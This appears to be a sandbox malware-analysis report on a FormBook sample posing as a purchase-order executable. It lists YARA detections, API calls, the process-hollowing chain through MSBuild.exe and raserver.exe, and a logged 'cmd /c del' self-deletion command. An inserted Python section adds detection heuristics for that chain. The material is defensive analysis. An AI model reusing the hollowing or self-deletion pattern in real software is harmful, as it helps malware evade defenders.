          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Purchase Order 40,7045$.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417BA0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417C50 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417CD0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417D80 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417C4C NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417CCA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015299D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015298A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015295F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015296D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677BA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677C50 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677CD0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677D80 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677C4C NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677CCA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 014EB150 appears 136 times
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 047DB150 appears 72 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMARCUS.dll4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe | Binary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: *.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: /ignoreprojectextensions:.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp | Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@16/11
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 40,7045$.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01
          Source: Purchase Order 40,7045$.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmpBinary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Purchase Order 40,7045$.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Order 40,7045$.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Purchase Order 40,7045$.exeStatic file information: File size 1269760 > 1048576
          Source: Purchase Order 40,7045$.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x135800
          Source: Purchase Order 40,7045$.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000001.00000002.289628195.00000000014C0000.00000040.00000001.sdmp, raserver.exe, 00000006.00000002.522839886.00000000047B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
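The process chain recorded above (a .NET executable on the user's Desktop starting MSBuild.exe with nothing but its own path, a SysWOW64 raserver.exe whose parent the report could not resolve, and cmd.exe trying to delete MSBuild.exe) is easier to catch from process-creation telemetry than from the file itself. The following is an added example and not Joe Sandbox code: two heuristics over constructed Sysmon-style events. The ProcEvent record, its field names and the PIDs are assumptions; the image paths and command lines are the ones this report shows, so the self-deletion rule can match the hollowed host.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed, Sysmon-style field subset)."""
    pid: int
    image: str        # full path of the created process
    cmdline: str      # raw command line as logged
    parent_pid: int


WINDOWS_DIR = "c:\\windows\\"
PROJECT_EXT = (".sln", ".csproj", ".vbproj", ".vcxproj", ".proj", ".targets")


def split_cmdline(cmdline):
    """Minimal tokenizer: whitespace-separated, double or single quotes group a token."""
    return [t.strip("\"'") for t in re.findall(r'"[^"]*"|\'[^\']*\'|\S+', cmdline)]


def basename(path):
    return ntpath.basename(path).lower()


def rule_msbuild_without_project(ev, by_pid):
    """MSBuild.exe is a build tool: a real run names a project/solution or passes switches
    (the MSBuild usage strings in this report show the normal shape). A command line that
    is nothing but the image path, started by a process living under a user profile, is
    what a .NET loader hollowing MSBuild looks like."""
    if basename(ev.image) != "msbuild.exe":
        return False
    args = split_cmdline(ev.cmdline)[1:]
    has_build_args = any(a.lower().endswith(PROJECT_EXT) or a.startswith(("/", "-")) for a in args)
    parent = by_pid.get(ev.parent_pid)
    parent_in_profile = parent is not None and "\\users\\" in parent.image.lower()
    return not has_build_args and parent_in_profile


def rule_delete_windows_file(ev, known_images):
    """cmd.exe /c del <file under C:\\Windows>. Parent links are deliberately not used: in this
    report raserver.exe's parent is unrecorded, so the join is on the target path instead.
    When the target is the image of another process in the trace, the injected code is
    trying to remove the binary it was hollowed into."""
    if basename(ev.image) != "cmd.exe":
        return None
    argv = [a.lower() for a in split_cmdline(ev.cmdline)]
    if "/c" not in argv or "del" not in argv:
        return None
    for target in argv[argv.index("del") + 1:]:
        if target.startswith(WINDOWS_DIR):
            return "del_hollowed_host" if target in known_images else "del_windows_file"
    return None


def evaluate(events):
    """Return (rule, pid) alerts for a list of ProcEvent."""
    by_pid = {e.pid: e for e in events}
    known_images = {e.image.lower() for e in events}
    alerts = []
    for ev in events:
        if rule_msbuild_without_project(ev, by_pid):
            alerts.append(("msbuild_without_project", ev.pid))
        hit = rule_delete_windows_file(ev, known_images)
        if hit:
            alerts.append((hit, ev.pid))
    return alerts


# Constructed events mirroring the chain in this report; PIDs are made up.
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Users\user\Desktop\Purchase Order 40,7045$.exe",
              r'"C:\Users\user\Desktop\Purchase Order 40,7045$.exe"', 100),
    ProcEvent(102, MSBUILD, MSBUILD, 101),                       # hollowed: command line is just the path
    ProcEvent(103, r"C:\Windows\SysWOW64\raserver.exe", r"C:\Windows\SysWOW64\raserver.exe", 99),  # parent not in trace
    ProcEvent(104, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{MSBUILD}'", 103),
    ProcEvent(105, MSBUILD, "MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release", 98),  # benign developer build
]

if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The second rule does not walk parent links on purpose: FormBook reaches raserver.exe through explorer.exe rather than from MSBuild.exe, which is why the report lists its parent as unknown, so the join has to be on the deleted path, which in a hollowing chain equals another process's image. Whether the delete actually succeeds depends on the account's rights over C:\Windows; the attempt is the signal.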

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Purchase Order 40,7045$.exe, a?opP?s???y/WD??v?aA?O.cs | .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Purchase Order 40,7045$.exe.810000.0.unpack, a?opP?s???y/WD??v?aA?O.cs | .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_0130DF50 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00415913 push edx; retf
